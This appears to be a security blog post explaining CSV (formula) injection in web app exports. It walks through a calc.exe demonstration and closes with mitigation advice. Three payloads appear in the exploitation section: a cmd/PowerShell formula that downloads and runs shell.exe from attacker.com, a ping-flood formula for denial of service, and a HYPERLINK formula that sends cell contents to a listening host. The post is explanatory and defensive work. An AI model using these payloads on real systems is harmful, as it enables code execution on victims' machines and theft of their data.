CSV Injection

Hello & Welcome Everyone!!

Today in this blog we are going to discuss about CSV Injection.

Before going to start the discussion we will first understand, what is CSV file, what is CSV injection etc.

What is CSV file?

CSV is an acronym for “Comma Separated Values” which is used to store the tabular data (numbers and text) in plain text. Each record consists of one or more fields, separated by comma.

Why CSV file used in the web applications?

Nowadays, there are many web application and frameworks being developed which allow users to export the data saved in database into a CSV file. The CSV file created might lead to CSV injection. So it becomes very important to be sure that the file exported through the web application is safe and will not leave the users system prone to any attack. 

What is CSV Injection?

CSV Injection also known as Formula Injection. It occurs when websites uses untrusted user input inside CSV files without validating.

Below Diagram shows CSV Injection Scenario:

Now we understood what is CSV file and CSV injection, next we will go through CSV Injection and Exploitation of CSV Injection.

CSV Injection aka Formula Injection. It occurs when websites embed untrusted user input inside CSV files without validating. When the user tries to open the CSV file using any spreadsheet program such as Microsoft Excel or LibreOffice Calc, any cells starting with ‘=’ will be interpreted by the software as a formula.

Spread sheet programs like Microsoft Excel, Open Office, Libre Office Calc are not a new programs. We have been using it to perform different task like calculation, analysis, and visualization of data and information. These software’s provide many formulas and functions which can be used by us in our day to day life.

Below screenshot shows the Microsoft Excel allowing to adding value of two fields and displaying it in next field.

This shows that these spread sheets will treat input as formula if it starts with sign (‘=’).

How does a simple CSV file and its simple functions can be a threat?

After downloading the infected CSV file, a user may choose to open it in spread sheet software such as Microsoft Excel or LibreOffice. A malicious user could have inserted a malicious formula (starting with =) that got included in the CSV file when the data was exported. This happened due to the inability of the web application to properly sanitise the user input. When the file is opened in Excel or LibreOffice, the contents of the cell containing the formula might get executed.

Exploiting CSV Injection

Suppose an application allows an admin to export application’s user data as a CSV file. The data exported contains names and other data’s. Let us consider a specific case how attacker can run system commands on admin computer

Exploiting with system command:

In this case, we suppose that the admin opens the CSV file in MS-Excel.  How popping up a calculator has become a standard step while testing vulnerabilities such as remote code execution on a Windows machine. We are going to do the same thing here, running the famous calc.exe.

Below screenshot shows that there is an event form in recruiting application where attacker fills the form with system command as shown below.

Below screenshot shows that admin exporting and opening the user data in CSV format.

Below screenshot shows that admin computer is affected with attacker’s system command which he injected in the application event form.

This is how a CSV Injection can be dangerous. We showed simplest way to exploit CSV injection there are many ways to exploit this vulnerability.

So we can take this attack further more as mentioned below.

We can install shell in the system using below payload, after installing shell we can extend it to further attacks

  • Payload: =cmd|’ /C powershell Invoke-WebRequest “http://www.attacker.com/shell.exe” -OutFile “$env:Temp\shell.exe”; Start-Process “$env:Temp\shell.exe”‘!A1

We can make the system as a BOT which we can use for dos attacks. Through this we can make the victim system to send unlimited ping request to any target server. This might result in the target server been flooded with many request and ultimate down time in the server when many systems are affected through this CSV injection attack.

  • Payload: =cmd|’/C ping –t ‘target-ip’ -l 25152′!’A1′

We can also inject hyperlinks to grab the sensitive information in the CSV file

  • Payload: =HYPERLINK(“http://localhost:4444?leak=”&B2&B3&C2&C3,”error: click here to resolve “)

Impact of the Vulnerability: A malicious user can use this vulnerability to execute formulas or inject reverse shell to gain the access of the user system.

OWASP Category: Injection [A1]

Recommendation:

To mitigate this type of attack block the below mentioned characters in user entry points of the functionality

  • Equals to (“=”)
  • Plus (“+”)
  • Minus (“-“)
  • At (“@”)

Further One can add apostrophe (‘) in the beginning of the cell containing such characters. Adding apostrophe (‘) tells excel that the cell doesn’t contain formula and on viewing the MS Excel do not display apostrophe (‘) when entered as first character in the cell.

About Author:

Vinay Ankalkoti , is an information security enthusiast working as information security consultant @ ISECURION

Reference:

https://www.we45.com/blog/2017/02/14/csv-injection-theres-devil-in-the-detail

https://owasp.org/www-community/attacks/CSV_Injection

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.